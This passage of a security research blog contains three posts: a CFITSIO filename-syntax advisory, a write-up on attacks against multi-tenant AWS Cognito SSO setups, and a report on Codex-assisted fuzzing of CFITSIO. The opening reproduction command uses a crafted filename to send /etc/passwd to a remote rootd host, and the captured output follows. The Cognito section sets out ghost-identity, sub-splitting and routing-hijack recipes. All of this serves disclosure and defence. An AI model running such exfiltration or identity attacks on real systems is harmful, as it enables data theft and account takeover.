In our Docker playground, it can be reproduced with:

docker run --network=host --rm cfitsio:4.6.3 \
  fits-sample-opener '/etc/passwd(root://127.0.0.1:1094//foobar)[b500,1][*,*]'

On the host side, we used a tiny Python server that implements just enough of the legacy protocol to receive the data and print what arrived. Its full code can be found in the playground as root.py.

The server is pretty verbose. The captured output includes a fabricated FITS header followed by the first 500 bytes of /etc/passwd content.

Connection from ('127.0.0.1', 49332)
recv_message: len=4 op=ROOTD_USER payload_len=0
Username:
send_message: op=ROOTD_AUTH payload_len=4
recv_message: len=4 op=ROOTD_PASS payload_len=0
Password bytes: b''
send_message: op=ROOTD_AUTH payload_len=4
recv_message: len=19 op=ROOTD_OPEN payload_len=15
Open request: //foobar create
send_message: op=ROOTD_OPEN payload_len=4
Handshake complete; entering data loop.
recv_message: len=12 op=ROOTD_PUT payload_len=8
handle_session: received ROOTD_PUT (2005) payload=b'0 2880 \x00'
handle_session: expecting 2880 bytes for PUT data at offset 0
PUT offset=0 length=2880 preview=b'SIMPLE  =                    T / file does conform to FITS stand'...
send_message: op=ROOTD_PUT payload_len=4
recv_message: len=15 op=ROOTD_PUT payload_len=11
handle_session: received ROOTD_PUT (2005) payload=b'2880 2880 \x00'
handle_session: expecting 2880 bytes for PUT data at offset 2880
PUT offset=2880 length=2880 preview=b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/u'...
send_message: op=ROOTD_PUT payload_len=4
recv_message: len=4 op=ROOTD_FLUSH payload_len=0
handle_session: received ROOTD_FLUSH (2007) payload=b''
FLUSH requested
send_message: op=ROOTD_FLUSH payload_len=4
Connection closed while attempting to reply.
Captured file content (5760 bytes):
SIMPLE  =                    T / file does conform to FITS standard             BITPIX  =                    8 / number of bits per data pixel                  NAXIS   =                    2 / number of data axes                            NAXIS1  =                  500 / length of data axis 1                          NAXIS2  =                    1 / length of data axis 2                          EXTEND  =                    T / FITS dataset may contain extensions            COMMENT   FITS (Flexible Image Transport System) format is defined in 'AstronomyCOMMENT   and Astrophysics', volume 376, page 359; bibcode: 2001A&A...376..359H END                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin

This was a great outcome! A file exfiltration primitive, chained from a series of interesting parser quirks, that at some point started looking like exploitation building blocks.

Edge Cases and Workarounds

There is a safe route, but it is not the default one. If a program explicitly uses fits_open_diskfile or fits_open_datafile, CFITSIO opens the path literally and does not interpret EFS. Some applications do this intentionally, although in a few cases we found it was done for functional reasons rather than security awareness. For example, users were unable to open files with brackets or parentheses in their names, so the literal open routine looked like the easier fix.

Siril, an astronomical image processing tool, is such a case. While reviewing its code, we noticed that Siril had already moved away from the default EFS-aware open path and explicitly used the literal fits_open_diskfile routine instead. The motivation, however, was not a security hardening effort. It appears to have been a practical fix for user-facing parsing problems, specifically filenames containing characters that the EFS parser wanted to interpret. The relevant Siril commit references the underlying issue #475 where purely functional matters are discussed. In other words, one of the more popular open-source astrophotography tools ended up disabling the feature because it was getting in the way of normal file handling, not because EFS had been recognized as a dangerous attack surface.

Similarly, NASA’s own fitsverify tool, distributed with CFITSIO and used to verify FITS standard compliance, also moved to fits_open_diskfile in the standalone version. The release notes describe the motivation as purely functional: “This allows for file paths with special characters…that would otherwise fail”.

Hard to Fix

Memory corruption bugs reported earlier were easier to address. This class of issues is complex to mitigate given that CFITSIO is behaving as designed. Furthermore, all these filtering, transformation, and access behaviors are actively used by scientific software out there. Backward compatibility matters a lot in scientific tooling. FITS itself survives because old data must keep working, and CFITSIO grew around that reality for decades.

As with previous bugs, we prepared a security advisory summarizing the insecure designs and anti-patterns discussed here. This was shared with NASA’s HEASARC team on January 22, 2026. Each finding includes dedicated remediation suggestions, but the overall recommendation is to change the default behavior and trust boundaries, rather than remove the functionality entirely. Our pragmatic proposal is to make EFS an explicit runtime opt-in, for example via an environment variable, while preserving the current API for software that intentionally relies on it. It’s still a change, but with much less impact.

As of today, the safest mitigations for developers using CFITSIO are:

Use fits_open_diskfile or fits_open_datafile when you need to open a literal file path.
Treat EFS as a privileged feature and strictly limit where it can be used.
Apply additional filename sanitization before passing input to EFS.
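
As a rough illustration of the last point, the sketch below uses a strict allowlist instead of trying to enumerate every character EFS treats as special. The function name and the allowed character set are assumptions made for this example; it is not a complete defense and does not replace the literal open routines.

```python
import re

# Hypothetical allowlist: letters, digits, dot, underscore, slash and hyphen.
# It is deliberately narrower than whatever EFS treats as special, so
# brackets, parentheses, spaces, '+' and ':' are all rejected.
_SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]+")


def is_plain_fits_path(candidate: str) -> bool:
    """Return True only for strings that look like ordinary file paths."""
    if not _SAFE_PATH.fullmatch(candidate):
        return False
    # Reject an empty final component or one starting with '-', which many
    # parsers treat as an option or a stream rather than a file name.
    basename = candidate.rsplit("/", 1)[-1]
    return bool(basename) and not basename.startswith("-")
```

Note that this check says nothing about path traversal or where the file lives; those need their own handling.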

In summary, if a parameter is called a filename but behaves like a small programming language, it deserves to be threat-modeled like one.

The Danger of Multi-SSO AWS Cognito User Pools

2026-05-05T00:00:00+02:00

After a small detour, the CloudSecTidbits series is back with new episodes. We had the opportunity to present them at the first DEFCON in Singapore a few days ago during our DemoLabs sessions. Meeting Singapore’s community was indeed amazing - thanks again for having us!

From the Previous Episodes

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities.

We focus on vulnerabilities resulting from an insecure combination of web and cloud related technologies.

Every article includes an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Time to get ready and dive into a new tidbit.

Tidbit No. 4 - The Danger of Multi-SSO User Pools

What is AWS Cognito? If you need a refresher, you can start by reading the initial AWS Cognito introduction we did back in S1 Ep.2, Tampering User Attributes In AWS Cognito User Pools.

This time we leave simple setups behind and walk through the kind of multi-tenant Cognito deployment that is becoming the SaaS default: one User Pool, many tenants, and each tenant bringing “their” external IdP.

AWS Cognito Multi-SSO Flows

With Cognito User Pools, developers can register multiple external IdPs (OIDC and SAML) against a single pool and expose them via the hosted UI (managed login page), or via a custom login page that still hits the hosted SSO endpoints.

External IdPs are registered through the CreateIdentityProvider API. A minimal OIDC registration looks like this:
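
As a hedged sketch, a request for that API could be assembled with boto3 roughly as follows. The helper names and every value passed in are placeholders invented for this example; only the parameter names follow the CreateIdentityProvider API.

```python
def build_oidc_idp_request(user_pool_id, provider_name, issuer, client_id, client_secret):
    """Build keyword arguments for cognito-idp CreateIdentityProvider (OIDC)."""
    return {
        "UserPoolId": user_pool_id,
        "ProviderName": provider_name,
        "ProviderType": "OIDC",
        "ProviderDetails": {
            "client_id": client_id,
            "client_secret": client_secret,
            "attributes_request_method": "GET",
            "oidc_issuer": issuer,
            "authorize_scopes": "openid email profile",
        },
        # IdP claim names on the right, user pool attributes on the left.
        "AttributeMapping": {"email": "email", "username": "sub"},
    }


def register_idp(cognito_client, request):
    # cognito_client is expected to be boto3.client("cognito-idp").
    return cognito_client.create_identity_provider(**request)
```

Keeping the request builder separate from the API call makes it easy to review what a tenant-supplied configuration would actually send to Cognito.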

Of course, such a registration is typically performed by the backend of a platform that supports custom IdP settings for its tenants.

Introducing a New Actor, AWS Lambda Triggers Primer

Triggers are synchronous hooks that allow developers to embed custom logic into event-driven flows.

When it comes to Cognito, the service invokes multiple triggers at specific stages of user creation and authentication through SSO. They stop the SSO authentication flow and allow custom logic to accept, reject, or modify it. In a normal implementation, they end up carrying all the “identity glue” required by the platform to be coherent with its other identity constraints: domain allowlists and ownership checks, tenant restrictions, JIT provisioning, attribute normalization, token shaping and so on.

The clearest way to think about it is by mapping the SSO triggers execution order and event types. Below you can find our go-to boundary guide for identity checks within the numerous triggers.

The main takeaways from a security perspective are:

The PreSignUp trigger is the only gate before the actual user object is created in the Cognito User Pool. Any identity that lands in the pool can be interacted with through other features of the platform
The trigger chains for the first federated sign-in and for subsequent sign-ins only share the TokenGeneration trigger. Any authentication constraint applied to only one of the two chains might allow full authentication through the other
Once the user is created in the pool, there is no automatic rollback mechanism; cleanup must be handled manually
Federated sign-in does not invoke any other custom authentication challenge, migrate user, custom message, or custom sender triggers in your user pool
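
The second takeaway can be turned into a quick review aid. The sketch below is a simplification: the two chains are transcribed from the takeaways above (an assumption of this example, to be verified against the current Cognito documentation), and the helper name is hypothetical.

```python
# Trigger chains as described in the takeaways above (assumed for this sketch).
CHAINS = {
    "first_federated_sign_in": ["PreSignUp", "PostConfirmation", "TokenGeneration"],
    "subsequent_sign_in": ["PreAuthentication", "PostAuthentication", "TokenGeneration"],
}


def unprotected_chains(triggers_with_check):
    """Return the chains in which no trigger carries the given identity check."""
    checked = set(triggers_with_check)
    return [name for name, chain in CHAINS.items() if not checked & set(chain)]
```

For example, a domain check that lives only in PreAuthentication leaves the first federated sign-in uncovered. The helper only tells you whether a check exists somewhere in a chain, not whether that trigger can actually block the flow.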

What if the IdP Is Malicious? Full Flow Example

The example below shows what happens when an external OIDC IdP is involved: Cognito performs a full OIDC code flow, fetches /userinfo, and merges claims according to the setup defined at creation.

The high-resolution SVG file can be downloaded here.

A malicious IdP could attack the platform relying on the multi-SSO Cognito User Pools in different ways, depending on constraints and the complex identity logic embedded in it.

Now we have everything: an extra injection point in the form of a malicious IdP talking to AWS Cognito, and a set of complex triggers gluing together the labyrinth of identity constraints.

Let’s go through the possible anti-patterns that might introduce bugs:

1. JIT Ghost Identity Injection: Sometimes Landing Is Enough

As mentioned before, the trigger PreSignUp_ExternalProvider is the only one that fires before Cognito has persisted the user record in the pool.

Getting a ghost identity is straightforward most of the time:

Register a malicious OIDC server as an IdP (EvilCorp) using the self-service SSO config page
Federate with an attacker@company.com email
PreSignUp_ExternalProvider fires and does not include the domain check, hence Cognito persists the user record
PostConfirmation (the JIT provisioning Lambda) fires and the domain check throws: the session is blocked, but the user record stays. PreAuthentication is configured with the same check too, but SSO is not the only way to interact with a user

From that point, even if there are rollback mechanisms that will delete it, you have an operational window in which it is possible to abuse other features of the platform and interact with such an identity. Worst-case scenarios include a forced password reset to gain non-SSO auth capability, impersonation of a user to get a direct session, and so on.
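
The ordering problem can be reproduced with a toy model. Everything below is a simplified simulation written for this post: the pool is a plain dictionary, and the function and exception names are invented; no real Cognito behavior is invoked.

```python
class DomainPolicyError(Exception):
    """Raised when an email domain is not allowed for the tenant."""


ALLOWED_DOMAINS = {"evilcorp.example"}  # hypothetical: domains the tenant verified


def check_domain(email):
    if email.rsplit("@", 1)[-1].lower() not in ALLOWED_DOMAINS:
        raise DomainPolicyError(email)


def federated_first_sign_in(pool, username, email, check_in_pre_signup):
    # Stage 1: PreSignUp is the only hook that runs before persistence.
    if check_in_pre_signup:
        check_domain(email)
    # The user record is now written to the pool.
    pool[username] = email
    # Stage 2: PostConfirmation. Raising here blocks the session,
    # but nothing removes the record that was just created.
    check_domain(email)
    return "session"
```

With check_in_pre_signup set to False, the call fails but the ghost record remains in the pool; with True, the flow is rejected before anything is stored.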

Tip: Weird escapes and other means of injection in other fields could lead to a wide range of vulnerabilities. Always review the components reading the identity object as a whole.

2. Trigger Source Values: Forgotten Events

Cognito distinguishes creation and authentication paths through multiple event.triggerSource values. The triggerSource is the named value given to custom handlers so they can understand the identity event and act accordingly.

There are many values, and some might be overlooked or misinterpreted by developers, introducing vulnerabilities.

The core values relevant to any multi-SSO security review are:

triggerSource	When it fires / security risk
`InboundFederation_ExternalProvider`	fires before the user record is written on every federated sign-in, for new and returning users; skipping it means attribute checks fall to `PreSignUp`, which only fires on the first login
`PreSignUp_ExternalProvider`	fires when a first federated login would create a local user; missing identity checks in it allow a durable ghost identity
`PreSignUp_AdminCreateUser`	usually fires on admin / SCIM creation paths
`PostConfirmation_ConfirmSignUp`	fires after confirmation, including auto-confirm on first federated login; cannot prevent user creation, only acts on an already-persisted record
`PreAuthentication_Authentication`	fires on subsequent logins only; does not fire on first federated login, so placing checks only there leaves first-login unprotected
`PostAuthentication_Authentication`	fires after every successful authentication but cannot block the session; detection and audit hook only, not a security gate
`TokenGeneration_Authentication`	fires on SDK/admin auth; different source from `HostedAuth`, logic applied to one is silently absent on the other

The complete reference with every possible triggerSource lives in the Lambda triggers documentation.

3. Federated Username Format & the Sub-Splitting Attack

Cognito’s internal identity key for federated users is not the email, it is:

<ProviderName>_<sub>

This appears as event.userName in triggers and as cognito:username in tokens. ProviderName is the IdP name registered in the pool and sub is the IdP subject identifier (attacker-controlled if the IdP is malicious).

Provider Collision: Case and Homoglyph

Cognito enforces uniqueness on byte-equal ProviderName, but two IdPs whose names are visually similar but byte-distinct are accepted in the same pool.

As an example:

Provider Name	Confusable codepoints	Rendering	Notes
`LegitCorp`	none (ASCII)	LegitCorp	baseline, accepted
`LеgitCorp`	`е` = U+0435 (Cyrillic small ie)	LegitCorp	homoglyph "e", accepted on the same pool

This is dangerous because most human-facing places do not surface the difference: Hosted UI buttons, audit logs, CLI output, and grep-based audits all just render Unicode and move on. Things get even worse with parser differentials: if an application normalizes inconsistently (lower(), NFKC, etc.), it could end up with split identities for the same IdP, or lookups resolving to the wrong record.
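
A few lines of Python make the collision tangible. This is only an illustrative sketch: the helper name is invented, and an ASCII-only policy is one possible mitigation, not something Cognito enforces.

```python
import unicodedata

latin = "LegitCorp"
lookalike = "L\u0435gitCorp"  # second character is U+0435, not ASCII "e"


def describe_non_ascii(name):
    """List every non-ASCII character in a provider name with its Unicode name."""
    return [(ch, unicodedata.name(ch, "UNKNOWN")) for ch in name if not ch.isascii()]


# The two names are byte-distinct, and neither lowercasing nor NFKC
# normalization folds the Cyrillic letter into its Latin lookalike.
names_differ = latin != lookalike
nfkc_differs = unicodedata.normalize("NFKC", lookalike) != latin
lower_differs = lookalike.lower() != latin.lower()
```

A platform that restricts provider names to ASCII at registration time avoids this particular class of confusion, at the cost of rejecting legitimate non-Latin names.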

Sub-Level Splitting Attack

The ProviderName regex forbids _. The sub claim does not. The complete identity string can therefore contain multiple underscores:

Corp_admin_override

If component A reads split("_", 1) and component B reads split("_")[-1] (or any other positional index), the same input produces two different meanings.

Sending sub = EVIL_noise_internal@company.com from the malicious IdP would result in:

Lambda	Code	Index	Sees
`pre_signup` (uniqueness guard)	`sub.split("_")[1]`	second token	`"noise"` not in pool, passes
`jit_provisioning` (consumer)	`sub.split("_")[-1]`	last token	`"internal@company.com"`, stored as `custom:primaryEmail`
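
The differential in the table can be reproduced directly. The two function names below are stand-ins for the guard and consumer Lambdas and are not taken from any real codebase.

```python
sub = "EVIL_noise_internal@company.com"


def guard_view(value):
    # What the uniqueness guard extracts: the second underscore-separated token.
    return value.split("_")[1]


def consumer_view(value):
    # What the provisioning consumer extracts: the last token.
    return value.split("_")[-1]
```

Both functions read the same attacker-supplied string, yet the guard validates one token while the consumer stores another.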

4. IdP Identifiers and Routing Hijacks

IdP identifiers are the strings Cognito uses for IdP redirection. The standard pattern is email-domain routing: a user types user@company.com, Cognito looks up company.com, and the browser is redirected to the IdP that owns that identifier.

Controlling an identifier effectively controls the initial redirection for all users of that identifier.

Hence, if a tenant drops or avoids registering an identifier, another IdP could claim it in the gap. As AWS Cognito does not ensure domain ownership, the platform itself should never allow claiming an idp-identifier without checking in advance that the tenant controls it.

It is a classic takeover of a domain with very dangerous outcomes. As an example, if gmail.com is claimable via a custom IdP configuration in a platform, you might end up redirecting every Google user to an attacker-controlled page.
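
On the platform side, the missing ownership check could look roughly like the sketch below. The data stores are plain dictionaries and all names are hypothetical; how a tenant proves ownership (DNS record, email challenge, and so on) is outside the scope of this example.

```python
class IdentifierClaimError(Exception):
    """Raised when a tenant may not claim the requested IdP identifier."""


def claim_idp_identifier(tenant_id, domain, verified_domains, claims):
    """Record a domain identifier for a tenant only if ownership was verified.

    verified_domains: dict mapping tenant_id -> set of domains with proven ownership
    claims: dict mapping domain -> tenant_id that currently holds the identifier
    """
    domain = domain.strip().lower()
    if domain not in verified_domains.get(tenant_id, set()):
        raise IdentifierClaimError(f"{tenant_id} has not verified {domain}")
    owner = claims.get(domain)
    if owner is not None and owner != tenant_id:
        raise IdentifierClaimError(f"{domain} is already claimed")
    claims[domain] = tenant_id
    return domain
```

Only after this check passes should the backend forward the identifier to Cognito in IdpIdentifiers.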

Do Not Trust the IdP

Multi-SSO changes which triggers fire, what the application treats as the identity key, and how many attacker-controlled strings you accidentally parse as structure. A control placed on the wrong trigger creates ghost identities, a parser placed on attacker-controlled sub values creates privilege escalation, and a self-service IdpIdentifiers field creates a routing hijack window.

For Cloud Security Auditors

While reviewing a Cognito-backed multi-tenant platform, answer the following questions:

Does the pool register external IdPs?
For each IdP, what is in AttributeMapping? Anything in there is attacker-controlled if the IdP is malicious or compromised, regardless of WriteAttributes.
How does the PreSignUp Lambda branch on event.triggerSource? Does it cover PreSignUp_ExternalProvider and PreSignUp_AdminCreateUser, not just PreSignUp_SignUp?
Are all identity checks covered in both trigger chains, for JIT and for subsequent SSO sign-in? If not, you should check for unwanted identity creation.
Does any Lambda parse event.userName or cognito:username with something like split("_") and a positional index? If yes, the parser is fragile against sub values containing _ and you should look for a guard/consumer differential.
Are IdpIdentifiers exposed in self-service IdP registration UIs? If yes, does the platform ensure that a domain id is being claimed by a tenant that confirmed its ownership? If not, arbitrary redirection of incoming users with unclaimed domains is possible.
Is AttributeMapping mapping any security-sensitive custom attributes (e.g., custom:tenantID, custom:role, custom:isAdmin)? Even with WriteAttributes locked down, JIT Lambdas using AdminUpdateUserAttributes will write them.

For Developers

Place security gates in PreSignUp, branched per triggerSource. This is the single most impactful change for multi-SSO deployments. A working pattern:

def lambda_handler(event, context):
    if event["triggerSource"] in (
        "PreSignUp_SignUp",
        "PreSignUp_ExternalProvider",
        "PreSignUp_AdminCreateUser",
    ):
        enforce_domain_policy(event["request"]["userAttributes"]["email"])
    return event

Never call split("_") on event.userName and pick a positional index to extract identity. If you must parse it, use split("_", 1) (maxsplit=1) everywhere it is parsed. The guard and the consumer must use identical extraction logic: positional indices on attacker-controlled strings are a parser differential vulnerability waiting to happen.
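
One way to guarantee identical extraction logic is to put it in a single helper that every Lambda imports. The function name is an assumption for this sketch.

```python
def split_federated_username(username):
    """Split '<ProviderName>_<sub>' on the first underscore only.

    The sub part is attacker-influenced and may itself contain underscores,
    so it is returned untouched as one opaque string.
    """
    parts = username.split("_", 1)
    if len(parts) != 2 or not all(parts):
        raise ValueError("not a federated username")
    provider, subject = parts
    return provider, subject
```

Because ProviderName cannot contain an underscore, the first underscore is the only unambiguous boundary in the string.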

Keep security-relevant custom attributes out of AttributeMapping. Derive tenantID and similar fields server-side from a verified email domain inside a trigger, never read them from event.request.userAttributes after federation.

Validate email strictly in PreSignUp.
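
What "strictly" means depends on the platform, but a conservative starting point could look like this sketch. The regular expression, the function name, and the allowed_domains parameter are all assumptions made for illustration, and the pattern is intentionally narrower than what the email RFCs permit.

```python
import re

# Conservative ASCII-only pattern: exactly one "@", dotted domain, alphabetic TLD.
_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")


def validate_email_for_tenant(email, allowed_domains):
    """Return the lowercased domain if the email is well-formed and allowed."""
    if not isinstance(email, str) or not _EMAIL.fullmatch(email):
        raise ValueError("malformed email")
    domain = email.rsplit("@", 1)[1].lower()
    if domain not in allowed_domains:
        raise ValueError("domain not allowed for this tenant")
    return domain
```

Rejecting anything outside the pattern, rather than trying to clean it up, keeps the guard and any later consumer from disagreeing about what the address means.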

For IdpIdentifiers: never expose them as a free-form field in self-service IdP registration. In IaC, register identifiers atomically. Do not “drop then add” in the same apply.

Tool Release: maSSO, a Malicious IdP for the Job

Almost every abuse described above assumes the same primitive: an attacker-controlled IdP that a Service Provider trusts, and the ability to tamper with the exact tokens, SAML assertions, and /userinfo payloads that reach it.

Running custom IdPs just for testing purposes was time-consuming, so we decided to release the one we use during pentests: doyensec/maSSO

maSSO is a weaponized compliant Single Sign-On (SSO) Identity Provider (IdP) for security testing of OIDC and SAML 2.0 Service Providers, also supporting the SCIM protocol.

For us, it was the missing Swiss Army knife for actual SP testing. Let us know your feedback!

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/tree/main/lab-masso

Stay tuned for the next episode!

Resources

CFITSIO Fuzzing: Memory Corruptions and a Codex-Assisted Pipeline

2026-04-20T00:00:00+02:00

Have you ever wondered how those amazing space photos are taken? Are they exclusive to the big telescopes floating in space or can you take one from your backyard? What does it take to extract hydrogen colors out of a seemingly black sky?

Those are great questions, but you won’t learn it from here.

Instead, I’ll show how I set up and performed fuzzing of the CFITSIO library which is how those space photos are usually processed. I’ll show how the bugs were triaged at scale, and how Codex was used to unblock the fuzzing and to develop the initial security fixes.

Note: the work described in this blogpost used GPT-5-Codex, which was the latest model I had access to at the time.

FITS Format

The Flexible Image Transport System (FITS) is a data standard created in the late 1970s by NASA, ESA, and the broader astronomy community. It started as a way to exchange telescope imagery across heterogeneous systems, but it evolved into a container for complex datasets: primary images, binary/ASCII tables, compressed tiles, world coordinate metadata, and instrument-specific headers. Today, most observatories, satellite missions, and even backyard observatories output FITS directly, so the ecosystem of tools is rich. Under the hood, FITS is far more than a simple image file - it routinely carries gigabyte-scale mosaics, time-series cubes, and calibration tables. The current FITS standard lives in a dense spec and most of it addresses astronomy beyond typical astrophotography - radio, infrared, X-ray, time-series, and polarization data with all their metadata are first-class in the spec, while backyard imaging uses only a small slice. Once telescopes and CCD cameras got cheap enough for hobbyists, the community needed tooling that already worked, so adopting FITS was the obvious shortcut. The format was battle-tested and carried all the metadata serious imaging needed. Ultimately, hobbyists inherited a rather complex data format that rarely changes because backward compatibility with old files is still mandatory.

There are several different libraries that claim to support the FITS format. Usually though, that only means some subset of the spec. CFITSIO is the most complete implementation and the library is used by numerous great pieces of astronomy software, therefore it piqued my interest.

For my fuzzing corpus, I’ve used some of my own astrophotos along with several public samples. I’m sure the coverage could be vastly improved with the right set of specialized data.

First Round: Generic Fuzzing

Initially, I began fuzzing using the standard AFL++ workflow. Harness code, testing corpus, some optimizations, with several sessions running over two weeks. This resulted in a security advisory consisting of six different bugs.

It was a quick experiment to see how fruitful the fuzzing could be and how the communication with the NASA team works. Fortunately, the cooperation was great and issues were quickly addressed by the HEASARC team.

Second Round: EFS

Having the setup ready to go, I decided to give it another shot. Testing was performed against cfitsio-4.6.3 which included fixes to previously reported issues. This time, I focused exclusively on the Extended Filename Syntax (EFS) which got my interest earlier. It’s a set of filters, enclosed in square brackets, that can be used to modify the raw file in various ways before it is opened and read by the application. Although EFS looks like a filename parser on the surface, it’s effectively a mini-language: image slicing, histogram generation, filters, pixel expressions, region filtering, arithmetic expressions, and the entire parser stack behind them.

An example FITS filename can look like this: myfile.fits[EVENTS][col Rad = sqrt(X**2 + Y**2)]

This opens a FITS file, selects the EVENTS extension, and creates a new column computed from existing data. The library does all of that before the application sees a single byte. The filename alone triggers extension lookup, column arithmetic, and a temporary file copy. Each bracket pair activates a different parser subsystem inside CFITSIO.

This represents a very interesting attack surface and it’s exposed in more places than people might think. Many applications accept filenames directly from external callers without realizing that CFITSIO will interpret them through EFS whenever fits_open_file or a similar routine is called (a non-EFS alternative, fits_open_diskfile, also exists). If those filenames come from untrusted input, the attack path is open.

This time, as I didn’t have much dedicated time, I relied heavily on help from GPT/Codex. First, it generated the harness code and some helpful cleanup utilities. The harness itself is minimal: it reads a filename string from a file, passes it to fits_open_file in read-only mode, then exits. That’s enough to exercise the entire EFS parsing and evaluation pipeline (or most of it, as I learned later), without needing complex application logic.

Early fuzzing cycles resulted not only in a lot of crashes, but also in unexpected files being created all over the filesystem and in the input FITS file being repeatedly destroyed. This wasn’t hard to fix though. I then asked GPT to look at the spec and the code and create a dictionary tailored to EFS tokens.

Within hours I had some clean crashes. This was nothing surprising given how much logic CFITSIO runs before it ever opens a file. Some days later, I ran AFLtriage and observed that just three different bugs were responsible for all the crashes I was seeing. The fuzzer couldn’t get any further and coverage barely moved. Even relatively simple code paths were unreachable, with random mutations constantly hitting the same shallow error paths.

To keep going, I had to automate more of the workflow. That’s when I brought in Codex again.

Workflow Improvements

I loaded the CFITSIO/harness sources into Codex and fed it the crash reports along with the input files. Within seconds, it identified the root cause of each issue. It also gave me correct functions, correct offsets, correct control flow, and assumptions that failed. It pointed to actual logic errors, such as operator-precedence mistakes, unchecked token lengths or unbounded concatenations. I was surprised how fast and accurate the analysis was.

The next step involved asking for the patch and applying it. This completely unblocked my fuzzing. I restarted the process using the old output directory with a new harness build and… left it running.

Two weeks later, I stopped the fuzzing and started investigating. AFLtriage again was very useful to quickly identify unique crashes. Learning from past experience, I went with Codex as my assistant again. After a few manual experiments I automated the following pipeline:

providing crash context and source code to Codex,
applying the proposed patch with a proper commit message,
rebuilding CFITSIO (with AFL++ and ASAN instrumentation included),
linking my fits-opener harness,
re-running the crashing input under ASAN,
confirming the fix and absence of regressions (including memory leaks).

Some fixes required multiple iterations. A patch that fixed an overflow might introduce a memory leak or leave an error path inconsistent. The automated loop caught those kinds of bugs. With just one verification test, it’s extremely likely that some functional issues were introduced. On the other hand, I skimmed the patches and they looked really solid, so… maybe not?

I repeated this process from scratch several times and ended up with 16 unique vulnerabilities, each pretty well understood, reproduced, and isolated.

Most of the bugs were from the old-school C string handling meets attacker-controlled input category. Some mismatched size checks on strncat, some stale realloc pointers, and some integer overflows in array math. This led to overflows on the stack and heap.

I did not attempt to weaponize any of the findings. CFITSIO might be used on so many platforms that some of them definitely miss even the most basic security mitigations. On the other hand, a quick inspection of stack overflows led me to believe that function frames are enormous and reaching control over RIP, or any function pointer, might be really challenging.

Example finding

Here is a brief overview of one of the findings (CFITSIO-EFS-01). It’s a typical syntax trap that most people will overlook but fuzzing should easily find.

In the Extended Filename Syntax, row filter expressions are encoded inside square brackets, like file.fits[2:f[R:f...]. The function ffifile2 accumulates them into a stack buffer called rowfilterx. Before each concatenation, it checks whether the new chunk would overflow the buffer:

if (strlen(rowfilterx) + (ptr2-ptr1 + (*rowfilterx)?4:0) > FLEN_FILENAME - 1) {
    free(infile);
    return(*status = URL_PARSE_ERROR);
}

Looks reasonable at a glance. There’s even a comment above it: “add extra 4 characters if we have pre-existing expression”. The intent is clear: if rowfilterx already holds something, the code wraps the new piece with ((...)), so it needs 4 extra bytes.

The problem is C operator precedence. The ternary ?: has lower precedence than +, so the parenthesized term does not add 4 to the chunk length. Instead, the whole sum becomes the ternary’s condition:

strlen(rowfilterx) + ((ptr2-ptr1 + (*rowfilterx)) ? 4 : 0) > FLEN_FILENAME - 1

That condition is non-zero for any non-empty chunk, so the term collapses to the constant 4 and the chunk length never enters the comparison. The check effectively becomes strlen(rowfilterx) + 4 > FLEN_FILENAME - 1, which stays false until rowfilterx is already almost full. Crafted filenames with a long chunk bypass it and strncat writes past rowfilterx, corrupting adjacent stack data.

The fix is just parentheses:

if (strlen(rowfilterx) + (ptr2 - ptr1 - 1) + ((*rowfilterx) ? 4 : 0) > FLEN_FILENAME - 1) {
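
To see the difference with numbers, the sketch below emulates in Python how a C compiler groups the original expression and compares it with the fixed one. It is an emulation, not CFITSIO code: the function names are invented, and the value 1025 for FLEN_FILENAME is an assumption about the library's header.

```python
FLEN_FILENAME = 1025  # assumed value of the CFITSIO constant


def buggy_check(buf, chunk_len):
    first_char = ord(buf[0]) if buf else 0  # stands in for *rowfilterx
    # C groups (chunk_len + first_char) as the condition of the ternary,
    # so the chunk length only decides between 4 and 0.
    extra = 4 if (chunk_len + first_char) else 0
    return len(buf) + extra > FLEN_FILENAME - 1


def fixed_check(buf, chunk_len):
    first_char = ord(buf[0]) if buf else 0
    extra = 4 if first_char else 0
    # The chunk length now takes part in the sum, as the comment intended.
    return len(buf) + (chunk_len - 1) + extra > FLEN_FILENAME - 1
```

With a 100-byte existing expression and a 2000-byte chunk, the original check does not fire while the fixed one does.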

This is the kind of bug where the developer clearly knew what they were protecting against. Yet, they got busted. It’s also a perfect example of what makes the Codex-assisted debugging effective. I handed it the crashing input, the ASAN trace, and the source file. Given those, it pinpointed the precedence issue right away.

Advisory

On November 17, 2025, the complete package (advisory, patches, crash files, and reproduction steps) was sent to the HEASARC/NASA maintainers. All code patches were Codex-generated. Since I don’t have access to a sufficient representation of real-world FITS files, I couldn’t validate functional regressions myself outside of a couple of test cases.

Once the security fixes landed in the repository, the team confirmed that the patches were very useful and even in the cases where ultimate fixes differed from the provided patches, they were still helpful to illustrate the problem. Some of them were applied without any changes.

The full advisory can be found here.

Closing Thoughts

Combining AFL++ with automated static guidance and automated fix validation proved to be very effective on a complex, legacy-heavy codebase and saved me a ton of time. I’m also happy that the HEASARC/NASA maintainers found the patches useful.

For the time being, I do not intend to continue CFITSIO fuzzing. Sadly, I believe there are still numerous memory issues lurking in old codebases like this. I hope that emerging security-oriented LLMs will be especially useful for identifying and fixing issues in projects appearing to the community as less interesting than the next major browser or CMS.

